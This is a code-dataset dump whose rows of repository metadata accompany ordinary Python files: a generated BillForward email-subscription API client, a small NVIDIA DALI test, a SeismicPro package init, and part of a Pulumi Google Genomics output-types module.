| 129.125 | 2,059 | 0.914535 | 186 | 7,231 | 35.413978 | 0.473118 | 0.005465 | 0.004554 | 0.005769 | 0.022772 | 0.01761 | 0.01761 | 0.01761 | 0.01761 | 0.01761 | 0 | 0.69864 | 0.054211 | 7,231 | 55 | 2,060 | 131.472727 | 0.264512 | 0 | 0 | 0.18 | 0 | 0 | 0.828378 | 0.806666 | 0 | 1 | 0 | 0 | 0 | 1 | 0.02 | false | 0.02 | 0.1 | 0 | 0.12 | 0.08 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
eed510909e9281ff1529d6d3d7d5b7896ad8f4f7 | 27,188 | py | Python | billforward/apis/emailsubscriptions_api.py | billforward/bf-python | d2b812329ca3ed1fd94364d7f46f69ad74665596 | [
"Apache-2.0"
] | 2 | 2016-11-23T17:32:37.000Z | 2022-02-24T05:13:20.000Z | billforward/apis/emailsubscriptions_api.py | billforward/bf-python | d2b812329ca3ed1fd94364d7f46f69ad74665596 | [
"Apache-2.0"
] | null | null | null | billforward/apis/emailsubscriptions_api.py | billforward/bf-python | d2b812329ca3ed1fd94364d7f46f69ad74665596 | [
"Apache-2.0"
] | 1 | 2016-12-30T20:02:48.000Z | 2016-12-30T20:02:48.000Z | # coding: utf-8
"""
BillForward REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class EmailsubscriptionsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_email_subscription(self, request, **kwargs):
"""
Create an email subscription.
{\"nickname\":\"Create an email subscription\",\"request\":\"createEmailSubscriptionRequest.html\",\"response\":\"creatEmailSubscriptionResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_email_subscription(request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param BillingEntityBase request: . (required)
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_email_subscription_with_http_info(request, **kwargs)
else:
(data) = self.create_email_subscription_with_http_info(request, **kwargs)
return data
def create_email_subscription_with_http_info(self, request, **kwargs):
"""
Create an email subscription.
{\"nickname\":\"Create an email subscription\",\"request\":\"createEmailSubscriptionRequest.html\",\"response\":\"creatEmailSubscriptionResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_email_subscription_with_http_info(request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param BillingEntityBase request: . (required)
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['request']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_email_subscription" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `create_email_subscription`")
resource_path = '/email-subscriptions'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def delete_email_subscription_by_type(self, type, **kwargs):
"""
Unsubscribe from the email specified by the type parameter.
{ \"nickname\" : \"Unsubscribe\",\"response\" : \"unsubscribeEmail.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_email_subscription_by_type(type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str type: (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_email_subscription_by_type_with_http_info(type, **kwargs)
else:
(data) = self.delete_email_subscription_by_type_with_http_info(type, **kwargs)
return data
def delete_email_subscription_by_type_with_http_info(self, type, **kwargs):
"""
Unsubscribe from the email specified by the type parameter.
{ \"nickname\" : \"Unsubscribe\",\"response\" : \"unsubscribeEmail.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_email_subscription_by_type_with_http_info(type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str type: (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['type', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_email_subscription_by_type" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'type' is set
if ('type' not in params) or (params['type'] is None):
raise ValueError("Missing the required parameter `type` when calling `delete_email_subscription_by_type`")
resource_path = '/email-subscriptions/type={type}'.replace('{format}', 'json')
path_params = {}
if 'type' in params:
path_params['type'] = params['type']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'text/xml'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_all_email_subscriptions(self, state, type, **kwargs):
"""
Returns a collection of all email-subscriptions. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get all email subscriptions\",\"response\":\"getEmailSubscriptionsAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_email_subscriptions(state, type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str state: Constrains search to Email Subscriptions of a specific state. (required)
:param str type: Constrains search to Email Subscriptions of a specific type (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first email-subscription to return.
:param int records: The maximum number of email-subscription to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_all_email_subscriptions_with_http_info(state, type, **kwargs)
else:
(data) = self.get_all_email_subscriptions_with_http_info(state, type, **kwargs)
return data
def get_all_email_subscriptions_with_http_info(self, state, type, **kwargs):
"""
Returns a collection of all email-subscriptions. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get all email subscriptions\",\"response\":\"getEmailSubscriptionsAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_email_subscriptions_with_http_info(state, type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str state: Constrains search to Email Subscriptions of a specific state. (required)
:param str type: Constrains search to Email Subscriptions of a specific type (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first email-subscription to return.
:param int records: The maximum number of email-subscription to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state', 'type', 'organizations', 'offset', 'records', 'order_by', 'order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_email_subscriptions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'state' is set
if ('state' not in params) or (params['state'] is None):
raise ValueError("Missing the required parameter `state` when calling `get_all_email_subscriptions`")
# verify the required parameter 'type' is set
if ('type' not in params) or (params['type'] is None):
raise ValueError("Missing the required parameter `type` when calling `get_all_email_subscriptions`")
resource_path = '/email-subscriptions'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
if 'state' in params:
query_params['state'] = params['state']
if 'type' in params:
query_params['type'] = params['type']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_email_subscription_by_id(self, email_subscription_id, **kwargs):
"""
Retrieves a single email subscription, specified by ID.
{ \"nickname\" : \"Retrieve by ID\",\"response\" : \"getEmailSubscriptionByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_email_subscription_by_id(email_subscription_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str email_subscription_id: (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param bool include_retired: Include deleted email-subscriptions
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_email_subscription_by_id_with_http_info(email_subscription_id, **kwargs)
else:
(data) = self.get_email_subscription_by_id_with_http_info(email_subscription_id, **kwargs)
return data
def get_email_subscription_by_id_with_http_info(self, email_subscription_id, **kwargs):
"""
Retrieves a single email subscription, specified by ID.
{ \"nickname\" : \"Retrieve by ID\",\"response\" : \"getEmailSubscriptionByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_email_subscription_by_id_with_http_info(email_subscription_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str email_subscription_id: (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param bool include_retired: Include deleted email-subscriptions
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['email_subscription_id', 'organizations', 'include_retired']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_email_subscription_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'email_subscription_id' is set
if ('email_subscription_id' not in params) or (params['email_subscription_id'] is None):
raise ValueError("Missing the required parameter `email_subscription_id` when calling `get_email_subscription_by_id`")
resource_path = '/email-subscriptions/{email-subscription-id}'.replace('{format}', 'json')
path_params = {}
if 'email_subscription_id' in params:
path_params['email-subscription-id'] = params['email_subscription_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'include_retired' in params:
query_params['include_retired'] = params['include_retired']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def update_email_subscription(self, request, **kwargs):
"""
Update an email subscription.
{\"nickname\":\"Update EmailSubscription\",\"request\":\"updateEmailSubscriptionRequest.html\",\"response\":\"updateEmailSubscriptionResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_email_subscription(request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param BillingEntityBase request: . (required)
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_email_subscription_with_http_info(request, **kwargs)
else:
(data) = self.update_email_subscription_with_http_info(request, **kwargs)
return data
def update_email_subscription_with_http_info(self, request, **kwargs):
"""
Update an email subscription.
{\"nickname\":\"Update EmailSubscription\",\"request\":\"updateEmailSubscriptionRequest.html\",\"response\":\"updateEmailSubscriptionResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_email_subscription_with_http_info(request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param BillingEntityBase request: . (required)
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['request']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_email_subscription" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `update_email_subscription`")
resource_path = '/email-subscriptions'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 44.497545 | 160 | 0.598977 | 2,784 | 27,188 | 5.653017 | 0.08944 | 0.065891 | 0.017791 | 0.022875 | 0.895667 | 0.873491 | 0.859321 | 0.852205 | 0.837527 | 0.834477 | 0 | 0.000807 | 0.31639 | 27,188 | 610 | 161 | 44.570492 | 0.845959 | 0.390319 | 0 | 0.718861 | 1 | 0 | 0.181775 | 0.06888 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039146 | false | 0 | 0.024911 | 0 | 0.120996 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
013dd20b1d479d48496b43799d2375a439935748 | 168 | py | Python | test/nvidia_dali_test.py | shuguang101/Deep-Speaker-Using-Domain-Adaptive | db459b8b42de3ac4f77bfea61792ffb9e03e47e4 | [
"MIT"
] | 1 | 2022-03-16T00:33:26.000Z | 2022-03-16T00:33:26.000Z | test/nvidia_dali_test.py | shuguang101/Deep-Speaker-Using-Domain-Adaptive | db459b8b42de3ac4f77bfea61792ffb9e03e47e4 | [
"MIT"
] | null | null | null | test/nvidia_dali_test.py | shuguang101/Deep-Speaker-Using-Domain-Adaptive | db459b8b42de3ac4f77bfea61792ffb9e03e47e4 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
from nvidia.dali.pipeline import Pipeline
import nvidia.dali.ops as ops
import nvidia.dali.types as types
if __name__ == '__main__':
pass
| 16.8 | 41 | 0.714286 | 25 | 168 | 4.48 | 0.6 | 0.267857 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007143 | 0.166667 | 168 | 9 | 42 | 18.666667 | 0.792857 | 0.119048 | 0 | 0 | 0 | 0 | 0.054795 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
6d733bd6c4d9228c4f07fa69df8b78e3d3625b06 | 199 | py | Python | seismicpro/models/__init__.py | pplotn/SeismicPro | a553c942c6f1f5e032611a66260718846259d643 | [
"Apache-2.0"
] | 1 | 2021-07-09T14:04:57.000Z | 2021-07-09T14:04:57.000Z | seismicpro/models/__init__.py | pplotn/SeismicPro | a553c942c6f1f5e032611a66260718846259d643 | [
"Apache-2.0"
] | null | null | null | seismicpro/models/__init__.py | pplotn/SeismicPro | a553c942c6f1f5e032611a66260718846259d643 | [
"Apache-2.0"
] | null | null | null | """Init file"""
from .hmm_model import * # pylint: disable=wildcard-import
from .unet_attention import * # pylint: disable=wildcard-import
from .metrics import * # pylint: disable=wildcard-import
| 39.8 | 64 | 0.748744 | 25 | 199 | 5.88 | 0.48 | 0.244898 | 0.387755 | 0.55102 | 0.727891 | 0.503401 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130653 | 199 | 4 | 65 | 49.75 | 0.849711 | 0.532663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
6dbb8bee807cd6cb3289ed5a3e94fcc8cfc69464 | 24,504 | py | Python | sdk/python/pulumi_google_native/genomics/v1alpha2/outputs.py | AaronFriel/pulumi-google-native | 75d1cda425e33d4610348972cd70bddf35f1770d | [
"Apache-2.0"
] | 44 | 2021-04-18T23:00:48.000Z | 2022-02-14T17:43:15.000Z | sdk/python/pulumi_google_native/genomics/v1alpha2/outputs.py | AaronFriel/pulumi-google-native | 75d1cda425e33d4610348972cd70bddf35f1770d | [
"Apache-2.0"
] | 354 | 2021-04-16T16:48:39.000Z | 2022-03-31T17:16:39.000Z | sdk/python/pulumi_google_native/genomics/v1alpha2/outputs.py | AaronFriel/pulumi-google-native | 75d1cda425e33d4610348972cd70bddf35f1770d | [
"Apache-2.0"
] | 8 | 2021-04-24T17:46:51.000Z | 2022-01-05T10:40:21.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = [
'DiskResponse',
'DockerExecutorResponse',
'LocalCopyResponse',
'PipelineParameterResponse',
'PipelineResourcesResponse',
]
@pulumi.output_type
class DiskResponse(dict):
"""
A Google Compute Engine disk resource specification.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "mountPoint":
suggest = "mount_point"
elif key == "readOnly":
suggest = "read_only"
elif key == "sizeGb":
suggest = "size_gb"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DiskResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DiskResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DiskResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
mount_point: str,
name: str,
read_only: bool,
size_gb: int,
source: str,
type: str):
"""
A Google Compute Engine disk resource specification.
:param str mount_point: Required at create time and cannot be overridden at run time. Specifies the path in the docker container where files on this disk should be located. For example, if `mountPoint` is `/mnt/disk`, and the parameter has `localPath` `inputs/file.txt`, the docker container can access the data at `/mnt/disk/inputs/file.txt`.
:param str name: The name of the disk that can be used in the pipeline parameters. Must be 1 - 63 characters. The name "boot" is reserved for system use.
:param bool read_only: Specifies how a sourced-base persistent disk will be mounted. See https://cloud.google.com/compute/docs/disks/persistent-disks#use_multi_instances for more details. Can only be set at create time.
:param int size_gb: The size of the disk. Defaults to 500 (GB). This field is not applicable for local SSD.
:param str source: The full or partial URL of the persistent disk to attach. See https://cloud.google.com/compute/docs/reference/latest/instances#resource and https://cloud.google.com/compute/docs/disks/persistent-disks#snapshots for more details.
:param str type: The type of the disk to create.
"""
pulumi.set(__self__, "mount_point", mount_point)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "read_only", read_only)
pulumi.set(__self__, "size_gb", size_gb)
pulumi.set(__self__, "source", source)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="mountPoint")
def mount_point(self) -> str:
"""
Required at create time and cannot be overridden at run time. Specifies the path in the docker container where files on this disk should be located. For example, if `mountPoint` is `/mnt/disk`, and the parameter has `localPath` `inputs/file.txt`, the docker container can access the data at `/mnt/disk/inputs/file.txt`.
"""
return pulumi.get(self, "mount_point")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the disk that can be used in the pipeline parameters. Must be 1 - 63 characters. The name "boot" is reserved for system use.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="readOnly")
def read_only(self) -> bool:
"""
Specifies how a sourced-base persistent disk will be mounted. See https://cloud.google.com/compute/docs/disks/persistent-disks#use_multi_instances for more details. Can only be set at create time.
"""
return pulumi.get(self, "read_only")
@property
@pulumi.getter(name="sizeGb")
def size_gb(self) -> int:
"""
The size of the disk. Defaults to 500 (GB). This field is not applicable for local SSD.
"""
return pulumi.get(self, "size_gb")
@property
@pulumi.getter
def source(self) -> str:
"""
The full or partial URL of the persistent disk to attach. See https://cloud.google.com/compute/docs/reference/latest/instances#resource and https://cloud.google.com/compute/docs/disks/persistent-disks#snapshots for more details.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the disk to create.
"""
return pulumi.get(self, "type")
@pulumi.output_type
class DockerExecutorResponse(dict):
"""
The Docker execuctor specification.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "imageName":
suggest = "image_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DockerExecutorResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DockerExecutorResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DockerExecutorResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
cmd: str,
image_name: str):
"""
The Docker execuctor specification.
:param str cmd: The command or newline delimited script to run. The command string will be executed within a bash shell. If the command exits with a non-zero exit code, output parameter de-localization will be skipped and the pipeline operation's `error` field will be populated. Maximum command string length is 16384.
:param str image_name: Image name from either Docker Hub or Google Container Registry. Users that run pipelines must have READ access to the image.
"""
pulumi.set(__self__, "cmd", cmd)
pulumi.set(__self__, "image_name", image_name)
@property
@pulumi.getter
def cmd(self) -> str:
"""
The command or newline delimited script to run. The command string will be executed within a bash shell. If the command exits with a non-zero exit code, output parameter de-localization will be skipped and the pipeline operation's `error` field will be populated. Maximum command string length is 16384.
"""
return pulumi.get(self, "cmd")
@property
@pulumi.getter(name="imageName")
def image_name(self) -> str:
"""
Image name from either Docker Hub or Google Container Registry. Users that run pipelines must have READ access to the image.
"""
return pulumi.get(self, "image_name")
@pulumi.output_type
class LocalCopyResponse(dict):
"""
LocalCopy defines how a remote file should be copied to and from the VM.
"""
def __init__(__self__, *,
disk: str,
path: str):
"""
LocalCopy defines how a remote file should be copied to and from the VM.
:param str disk: The name of the disk where this parameter is located. Can be the name of one of the disks specified in the Resources field, or "boot", which represents the Docker instance's boot disk and has a mount point of `/`.
:param str path: The path within the user's docker container where this input should be localized to and from, relative to the specified disk's mount point. For example: file.txt,
"""
pulumi.set(__self__, "disk", disk)
pulumi.set(__self__, "path", path)
@property
@pulumi.getter
def disk(self) -> str:
"""
The name of the disk where this parameter is located. Can be the name of one of the disks specified in the Resources field, or "boot", which represents the Docker instance's boot disk and has a mount point of `/`.
"""
return pulumi.get(self, "disk")
@property
@pulumi.getter
def path(self) -> str:
"""
The path within the user's docker container where this input should be localized to and from, relative to the specified disk's mount point. For example: file.txt,
"""
return pulumi.get(self, "path")
@pulumi.output_type
class PipelineParameterResponse(dict):
"""
Parameters facilitate setting and delivering data into the pipeline's execution environment. They are defined at create time, with optional defaults, and can be overridden at run time. If `localCopy` is unset, then the parameter specifies a string that is passed as-is into the pipeline, as the value of the environment variable with the given name. A default value can be optionally specified at create time. The default can be overridden at run time using the inputs map. If no default is given, a value must be supplied at runtime. If `localCopy` is defined, then the parameter specifies a data source or sink, both in Google Cloud Storage and on the Docker container where the pipeline computation is run. The service account associated with the Pipeline (by default the project's Compute Engine service account) must have access to the Google Cloud Storage paths. At run time, the Google Cloud Storage paths can be overridden if a default was provided at create time, or must be set otherwise. The pipeline runner should add a key/value pair to either the inputs or outputs map. The indicated data copies will be carried out before/after pipeline execution, just as if the corresponding arguments were provided to `gsutil cp`. For example: Given the following `PipelineParameter`, specified in the `inputParameters` list: ``` {name: "input_file", localCopy: {path: "file.txt", disk: "pd1"}} ``` where `disk` is defined in the `PipelineResources` object as: ``` {name: "pd1", mountPoint: "/mnt/disk/"} ``` We create a disk named `pd1`, mount it on the host VM, and map `/mnt/pd1` to `/mnt/disk` in the docker container. At runtime, an entry for `input_file` would be required in the inputs map, such as: ``` inputs["input_file"] = "gs://my-bucket/bar.txt" ``` This would generate the following gsutil call: ``` gsutil cp gs://my-bucket/bar.txt /mnt/pd1/file.txt ``` The file `/mnt/pd1/file.txt` maps to `/mnt/disk/file.txt` in the Docker container. Acceptable paths are: Google Cloud storage pathLocal path file file glob directory For outputs, the direction of the copy is reversed: ``` gsutil cp /mnt/disk/file.txt gs://my-bucket/bar.txt ``` Acceptable paths are: Local pathGoogle Cloud Storage path file file file directory - directory must already exist glob directory - directory will be created if it doesn't exist One restriction due to docker limitations, is that for outputs that are found on the boot disk, the local path cannot be a glob and must be a file.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "defaultValue":
suggest = "default_value"
elif key == "localCopy":
suggest = "local_copy"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PipelineParameterResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PipelineParameterResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PipelineParameterResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
default_value: str,
description: str,
local_copy: 'outputs.LocalCopyResponse',
name: str):
"""
